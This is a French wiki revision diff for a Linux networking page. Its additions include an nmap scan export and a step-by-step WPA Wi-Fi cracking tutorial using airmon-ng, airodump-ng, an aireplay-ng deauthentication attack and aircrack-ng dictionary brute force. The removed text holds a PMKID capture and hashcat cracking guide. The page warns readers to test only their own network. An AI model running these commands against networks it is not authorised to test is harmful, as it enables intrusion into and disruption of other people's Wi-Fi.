Outils pour utilisateurs

Outils du site


linux:network

Différences

Ci-dessous, les différences entre deux révisions de la page.

Lien vers cette vue comparative

Prochaine révision
Révision précédente
linux:network [2021/03/16 16:05] – créée t0muxlinux:network [2024/01/05 05:30] (Version actuelle) – modification externe 127.0.0.1
Ligne 31: Ligne 31:
  
 ==== Scan ==== ==== Scan ====
 +Pour toutes les commandes ci-dessous on peut aussi faire un export en xml (converti ensuite en html) via la commande suivante :
 +<code=bash>nmap -sn 192.168.1.0/24 -oX test.xml; xsltproc test.xml -o test.html</code>
  
 === Lister les hosts en ligne === === Lister les hosts en ligne ===
Ligne 198: Ligne 200:
 ==== Tester la sécurité d'un réseau ==== ==== Tester la sécurité d'un réseau ====
  
-Attention, ceci est à réaliser uniquement sur votre propre box internet. Vous êtes responsables de vos actes.+Attention, ceci est à réaliser uniquement sur votre propre réseau, il est strictement interdit par la loi de le faire sur le réseau de quelqu'un d'autre sans son accord préalable et écrit. Vous êtes responsables de vos actes.
  
-=== Installation des paquets nécessaires ===+Nous utiliserons la populaire suite aircrack.
  
-Sous Archlinux (utilisation d'un AUR Helper requise)+Le test de sécurité se déroule en 4 étapes principales : créer l'interface moniteur, cibler le réseau, récupérer le “handshake”, trouver le mot de passe.
  
-<code> +=== Créer l'interface moniteur ===
-yay -S hashcat hcxtools hcxdumptool aircrack-ng +
-</code>+
  
-=== Cibler la box ===+<code=bash>sudo airmon-ng # lister les cartes réseau 
 +sudo airmon-ng start wlp3s0 # lancer l'interface moniteur sur la carte wlp3s0 -> wlp3s0mon</code>
  
-  * Déconnecter le réseau wifi +=== Cibler le réseau ===
  
-  * Lister les interfaces +<code=bash>sudo airodump-ng wlp3s0mon # Lister les points d'accès pour en choisir un 
 +sudo airodump-ng --write mon_reseau --bssid 00:11:22:AA:BB:CC -c 1 wlp3s0mon</code>
  
-<code> +**–write** spécifie le fichier pour les données récupérées 
-ip link +**–bssid** spécifie l'adresse mac du réseau cible 
-</code>+**-c** pour spécifier le canal du réseau cible
  
-  * Lancer le moniteur sur l'interface wifi +=== Récupérer le handshake ===
  
-<code> +Dans un autre terminal, une autre fenêtre ou un autre onglet, saisir ceci pour récupérer le handshake. L'information apparaitra dans le airodump lancé précédemment. Cela peut prendre du temps, 10 secondes comme 15min…
-sudo airmon-ng start wlan0 +
-</code>+
  
-Une ligne devrait ressembler à ça (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]**wlan0mon**). Cela signifie que l'on vient de créer l'interface moniteur **wlan0mon**.+<code=bash>sudo aireplay-ng -0 1 -e mon_reseau -a 00:11:22:AA:BB:CC -h 55:66:77:DD:EE:FF wlp3s0</code>
  
-  Lister les points d'accès +**-0** spécifie le type d'attaque (1 pour la des-authentification) 
 +**-e** spécifie le nom du réseau 
 +**-a** l'adresse mac du réseau 
 +**-h** l'adresse mac de la carte réseau utilisée
  
-<code> +=== Trouver le mot de passe ===
-sudo airodump-ng wlan0mon +
-</code>+
  
-Une liste des BSSID alentours s'affiche. On peut y voir les nomsles canaux, le type de sécurité, les “beacons” et les adresses macs. Récupérer l'adresse mac du point d'accès que vous souhaitez tester.+Pour se fairenous devons utiliser un dictionnaireSaisir la commande suivante :
  
-On met ensuite l'adresse MAC dans un fichier texte :+<code=bash>sudo aircrack-ng -a 2 -w /dossier/mon_dico.txt ./mon_reseau.cap</code>
  
-<code> +**-a** type d'attaque (2 pour WPA) 
-echo '001122AABBCC' > mac.txt +**-w** chemin du dico (wordlist) 
-</code>+**./mon_reseau.cap** fichier de capture généré par airodump-ng
  
-=== Lancement de la capture === +Cette dernière opération peut prendre des heures, selon la taille du dictionnaire (puisqu'il s'agit d'un brute-force).
- +
-<code> +
-sudo hcxdumptool -o hash -i wlan0mon --filterlist=mac.txt --filtermode=2 enable_status=3 +
-</code> +
- +
-Le programme va lister une partie du traffic, ligne par ligne. Au bout d'un moment (2 à 5 min environ), une ligne [FOUND PMKID] doit apparaitre. Faire immédiatement Ctrl+C après l'apparition de cette ligne. +
- +
-=== Décryptage de la clé === +
- +
-  * Génération du fichier “hashtocrack”  +
- +
-<code> +
-hcxpcaptool -z hashtocrack hash +
-</code> +
- +
-  * Décryptage du fichier “hashtocrack”  +
- +
-<code> +
-hashcat -m 16800 hashtocrack -a 3 -w 3 '?u?d?u?d?d65D--force +
-</code> +
- +
-  * Afficher le mot de passe  +
- +
-<code> +
-hashcat -m 16800 hashtocrack -a 3 -w 3 '?u?d?u?d?d65D' --force --show +
-</code>+
  
-Le mot de passe est le dernier bloc de caractères après le 3ème “*”+Amusez vous bien, et faites pas de bétises ;)
  
-[[https://www.youtube.com/watch?v=DarsUXcHTSU|Source]]+Source https://www.kali-linux.fr/wifi/cracker-cle-wpa
linux/network.1615910754.txt.gz · Dernière modification : 2024/01/05 05:30 (modification externe)